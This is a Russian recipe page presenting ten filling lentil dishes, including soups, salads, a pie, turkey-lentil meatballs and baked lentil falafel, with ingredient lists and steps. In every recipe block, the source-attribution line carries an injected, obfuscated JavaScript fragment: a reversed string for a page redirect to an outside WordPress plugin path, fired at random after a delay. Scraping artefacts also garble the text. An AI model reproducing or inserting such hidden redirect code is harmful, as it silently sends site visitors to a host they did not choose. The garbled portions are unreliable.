О пользе чечевицы можно говорить долго, очень долго. Одно содержание белка (24 г в 100 г крупы) должно вас заставить задуматься о включении этого суперфуда в свой рацион. К тому же чечевица — превосходный источник железа и фолиевой кислоты. Другой вопрос, какие блюда из чечевицы приготовить. А вот какие!
- 1. Суп из чечевицы
- Ингредиенты
- 2. Суп из чечевицы с чипсами из бекона
- Ингредиенты
- 3. Салат из чечевицы с огурцами и оливками
- Ингредиенты
- 4. Тёплый французский салат с беконом и травами
- Ингредиенты
- 5. Ролл из пряной чечевицы
- Ингредиенты
- 6. Чечевица с яйцом
- Ингредиенты
- 7. Ирландский пирог с чечевицей, картофелем и грибами
- Ингредиенты
- 8. Чечевичные фрикадельки по-турецки с травяным соусом
- Ингредиенты
- 9. Тушёная чечевица с мангольдом
- Ингредиенты
- 10. Салат из запечённой чечевицы с фалафелем
- Для фалафеля
- Ингредиенты
- Для соуса из тахини и салата
- Ингредиенты
1. Суп из чечевицы
thekitchn.com
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
40 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Оливковое масло
1 ст. л.
Морковь
1 шт.
Стебли сельдерея
2 шт.
Лук
1 шт.
Соль
щепотка
Красная чечевица
1 стакан
Бульон
6 стаканов
Лавровый лист
1 шт.
Лимонный сок
2 ст. л.
Оливковое масло
по вкусу
Йогурт (для подачи)
по вкусу
- Нарежьте морковь, лук и сельдерей. Обжарьте всё в сотейнике (или в средней кастрюле) в оливковом масле в течение пяти минут. Не забудьте добавить щепотку соли и перемешать.
- Высыпьте чечевицу, влейте бульон (или воду), добавьте лавровый лист. Доведите смесь до кипения, а затем убавьте огонь до минимума. Варите 20 минут. Добавьте лимонный сок и перемешайте.
- Разлейте суп из чечевицы по тарелкам и перед подачей на стол украсьте оливковым маслом или йогуртом.
2. Суп из чечевицы с чипсами из бекона
thekitchn.com
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
40 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Бекон
4 ломтика
Лук
1 шт.
Морковь
1—2 шт.
Стебли сельдерея
2 шт.
Чеснок
2 зубчика
Томатная паста
2 ст. л.
Паприка
1 ст. л.
Тмин, соль
1 ч. л.
Корица
щепотка
Чечевица
1,5 стакана
Куриный или овощной бульон
6 стаканов
Лавровый лист
1 шт.
Греческий йогурт
0,5 стакана
Лимон
1 шт.
Рубленая петрушка
по вкусу
- Поджарьте бекон до хрустящего состояния. Выложите его на бумажное полотенце, чтобы стёк лишний жир.
- Нарежьте морковь, стебли сельдерея и лук кубиками. Разогрейте оливковое масло в кастрюле и обжаривайте в течение 5 минут лук, стебли сельдерея и морковь.
- Добавьте измельчённый чеснок, пасту, перец, тмин, соль и корицу. Держите блюдо на огне примерно полминуты. Как только чеснок начнёт выделять прекрасный аромат, влейте бульон, добавьте чечевицу и доведите суп до кипения. Уменьшите огонь до минимума и варите суп в течение 20—30 минут.
- Смешайте йогурт с соком одного лимона. Перед подачей на стол украсьте суп из чечевицы йогуртовой заправкой и чипсами из бекона.
3. Салат из чечевицы с огурцами и оливками
thekitchn.com
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
30 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Чечевица
2 стакана
Чеснок
2 зубчика
Лавровый лист
2 шт.
Зернистая горчица
2 ст. л.
Соль
0,5 ч. л.
Винный уксус
2 ст. л.
Оливковое масло
6 ст. л.
Огурец
2 шт.
Оливки (без косточек)
200 г
Листья мяты
10 шт.
Сыр фета
200 г
- Смешайте чечевицу, измельчённый чеснок и лавровый лист в большой кастрюле. Залейте 4 стаканами воды. Доведите до кипения на сильном огне, а затем варите на небольшом 15 минут. Слейте воду, чечевицу остудите.
- Приготовьте заправку: смешайте оливковое масло, уксус, горчицу и соль.
- Нарежьте огурцы и оливки. Смешайте с чечевицей, сыром фета и заправкой.
4. Тёплый французский салат с беконом и травами
thekitchn.com
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
50 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Чечевица (зелёная)
200 г
Куриный бульон
200 мл
Соль
щепотка
Перец
щепотка
Бекон
240 г
Небольшая луковица
2 шт.
Розмарин
2 веточки
Шалфей
3 листа
Каперсы
2 ст. л.
Петрушка
0,5 стакана
Оливковое масло
3 ст. л.
Дижонская горчица
1 ст. л.
Бальзамический уксус
0,5 ст. л.
- Варите чечевицу в курином бульоне в течение 30—40 минут.
- Поджарьте бекон до хрустящей корочки. После слейте половину оставшегося жира.
- Нарежьте лук, шалфей, розмарин, измельчите чеснок и добавьте в эту же сковороду. Готовьте 2—3 минуты до появления аромата чеснока.
- Смешайте чечевицу с беконом, рублеными каперсами, петрушкой и луком с шалфеем.
- Взбейте оливковое масло, уксус и горчицу. Заправьте этой смесью салат.
5. Ролл из пряной чечевицы
thekitchn.com
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
30 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Чечевица красная
0,5 стакана
Булгур
3/4 стакана
Оливковое масло
2 ст. л.
Лук
1 шт.
Молотый тмин
2 ч. л.
Красный перец
3 ч. л.
Зелёный лук
несколько перьев
Петрушка
2 ст. л.
Соль
щепотка
Болгарский перец
6 шт.
Лаваш
6 шт.
Тёртая капуста
2 стакана
Тахини
1/4 стакана
Чеснок
1/4 зубчика
петрушка
2 ч. л.
- Сделайте перечную пасту. Смешайте 1 ч. л. соли, щепотку чёрного перца, щепотку красного перца и болгарский перец в комбайне до получения однообразной массы. Тушите на среднем огне на сковороде, периодически помешивая, в течение 2 часов.
- Сделайте начинку. Отварите чечевицу до готовности. Положите к ней булгур и подождите 30 минут, пока он впитает воду. На сковороде в оливковом масле обжарьте до мягкости нарезанный на кубики лук. После добавьте тмин, красный перец и готовьте ещё одну минуту. Добавьте в чечевицу вместе с зелёным луком и петрушкой. Перемешайте смесь.
- Сделайте соус. Смешайте тахини, чеснок, петрушку и 1 ч. л. красного перца с 200 мл тёплой воды до получения однородной массы.
- Выложите на лаваш начинку, 1—2 ст. л. соуса и 1—2 ст. л. перечной пасты. Сверните ролл и разрежьте на 2 части.
6. Чечевица с яйцом
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
50—60 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Чечевица (красная)
1 стакан
Горох
1 стакан
Лук
2—3 шт.
Чеснок
2 зубчика
Гарам масала
2 ч. л.
Куриный бульон
4 стакана
Соль, перец
по вкусу
Кинза
100 г
Яйца
4 шт.
- Обжарьте до мягкости в течение пяти минут нарезанный лук, измельчённый чеснок на оливковом масле. Добавьте в смесь чечевицу, горох, гарам масалу и хорошо перемешайте.
- Добавьте бульон (или воду) и доведите смесь до кипения. Затем варите блюдо на минимальном огне 25—30 минут. Приправьте солью, перцем и кинзой.
- Нагрейте духовку до 200 градусов. Четыре формочки для выпекания смажьте маслом. Выложите в них чечевицу. В центре сделайте углубление и разбейте туда яйцо. Выпекайте 18—25 минут до готовности яиц.
7. Ирландский пирог с чечевицей, картофелем и грибами
thekitchn.com
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
120 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Сладкий картофель
5 шт.
Чечевица (зелёная)
1 стакана
Овсяные хлопья
3/4 стакана
Лавровый лист
1 шт.
Соль
1 ч. л.
Оливковое масло
1 ст. л.
Грибы
450 г
Морковь, лук, стебель сельдерея
по 1 шт.
Овощной бульон
3/4 стакана
Красное вино
1/4 стакана
Томатная паста, соевый соус
по 1 ст. л.
Паприка
1 ч. л.
Петрушка
1/4 стакана
- Разогрейте духовку до 200 градусов. Запеките картофель до мягкости (15—20 минут) и охладите.
- В средней кастрюле смешайте чечевицу, овсяные хлопья, лавровый лист с пятью стаканами воды. Варите на медленном огне 15—20 минут, пока чечевица не станет мягкой. Уберите лавровый лист, слейте воду.
- Нарежьте грибы кубиками и обжаривайте в оливковом масле, пока они немного не подрумянятся. Добавьте нарезанные лук, морковь, сельдерей и чеснок. Готовьте до того момента, пока лук не станет мягким и прозрачным.
- Переключите огонь на средний, добавьте чечевицу, томатную пасту, бульон, соус, перец, петрушку и специи. Варите пять минут.
- Извлеките мякоть картофеля, разомните её вилкой, посолите и поперчите. В форме для выпечки равномерно распределите чечевичную смесь, а сверху — картофель. Выпекайте 30 минут, пока картофель не покроется корочкой.
8. Чечевичные фрикадельки по-турецки с травяным соусом
thekitchn.com
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
35—40 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Готовая чечевица
1 стакан
Варёное или печёное мясо индейки
230 г
Яйца
2 шт.
Панировочные сухари
2/3 стакана
Нежирный йогурт
1/2 стакана
Сыр фета
1/4 стакана
Маслины
2 ст. л.
Каперсы
1 ст. л.
Чеснок
2 зубчика
Петрушка
3 ст. л.
Сушёный орегано
0,5 ч. л.
Сушёный укроп
2 ч. л.
Соль, перец
по щепотке
натуральный йогурт
1 стакан
лимонная цедра
1 ч. л.
- Измельчите в кухонном комбайне чечевицу и индейку. Добавьте в фарш яйца, сухари, нежирный йогурт, фету, нарезанные мелко маслины и каперсы, раздавленный зубчик чеснока, 2 ст. л. петрушки, орегано, 1 ч. л. укропа, соль и перец. Хорошо перемешайте массу и дайте ей настояться 15—20 минут.
- Разогрейте духовку до 200 градусов. Сформируйте фрикадельки и распределите их на противне. Выпекайте 20—25 минут — до тех пор, пока они не покроются корочкой.
- Сделайте соус. Смешайте натуральный йогурт с раздавленным зубчиком чеснока, 1 ст. л. петрушки, 1 ч. л. укропа, лимонную цедру. Подавайте вместе с фрикадельками.
9. Тушёная чечевица с мангольдом
thekitchn.com
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
35—45 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Мангольд
220 г
Оливковое масло
2 ст. л.
Лук
100 г
Морковь
100 г
Чечевица
1 стакан
Чеснок
2 зубчика
Лавровый лист
1 шт.
Тимьян (свежий)
1 ч. л.
Вода
2 стакана
Красный винный уксус
1 ч. л.
Соль, перец
по вкусу
Яйца
3—4 шт.
Петрушка
2 ст. л.
- Вырежьте сердцевину из клубней мангольда и нарежьте её кубиками. Также нарежьте лук и морковь. Листья салата отложите в сторону — они ещё пригодятся.
- Обжаривайте на масле на среднем огне лук, мангольд, морковь в течение пяти минут.
- Добавьте чечевицу, измельчённый чеснок, лавровый лист, тимьян и готовьте одну минуту. Перемешайте всё. Добавьте воду и доведите до кипения. Убавьте огонь и варите всё 20 минут. Извлеките лавровый лист. Добавьте нарезанные листья мангольда и готовьте ещё минут пять. Заправьте уксусом, зеленью, солью.
- Приготовьте яичницу и выложите её перед подачей на чечевицу.
10. Салат из запечённой чечевицы с фалафелем
thekitchn.com
Для фалафеля
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
45 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Красная чечевица
1 стакан
Листья петрушки
2 стакана
Листья кинзы
2 стакана
Чеснок
5 зубчиков
Лук красный
1 шт.
Перец серрано
1—2 шт.
Семена кунжута
1,5 ст. л.
Оливковое масло
1,5 ст. л.
Соль
1 ч. л.
Молотый тмин
1 ч. л.
Молотый кориандр
1 ч. л.
Сода
0, 5 ч. л.
Мука
1—3 ст. л.
Для соуса из тахини и салата
10 очень сытных блюд с чечевицей
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
20 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Кунжутная паста для тахини
1/3 стакана
Лимон (сок)
1 шт.
Вода
3 ст. л.
Чеснок
1 зубчик
Петрушка
1/4 стакана
Паприка
1/2 ч. л.
Соль, перец
по вкусу
Тосканская капуста
3 стакана
Морковь
3 шт.
Красный лук
1/4 стакана
Оливковое масло
3 ст. л.
Лимонный сок
1 ст. л.
- Замочите чечевицу в пресной воде на ночь. Перед готовкой слейте воду.
- В кухонном комбайне пюрируйте чечевицу. Добавьте петрушку, кинзу, чеснок, лук, перец и серрано, затем перемешайте ещё раз до однородной массы. Добавьте оливковое масло, специи и снова перемешайте. Добавьте соду и муку. Сформируйте фрикадельки и выложите на противень, выстланный бумагой для выпечки. Сбрызните шарики оливковым маслом и готовьте в духовке при 180—200 градусах до золотистого цвета (примерно 18—20 минут).
- Приготовьте соус: взбейте тахини, лимонный сок и воду. Смешайте с измельчённым чесноком, нарезанной петрушкой, паприкой и приправьте по вкусу солью и перцем.
- Нарежьте капусту, лук, морковь, смешайте с 1 ст. л. лимонного сока и оливковым маслом. Подавайте салат с фрикадельками и соусом из тахини.
Если вам понравилcя этот материал, можете подписаться на нашу страничку в «Фэйсбук» или «Вконтакте». С нами вы будете знать, как следить за своим здоровьем, и станете таким красивым, что все вокруг просто обзавидуются.
Наш сочный Instagram — вот по этой ссылке.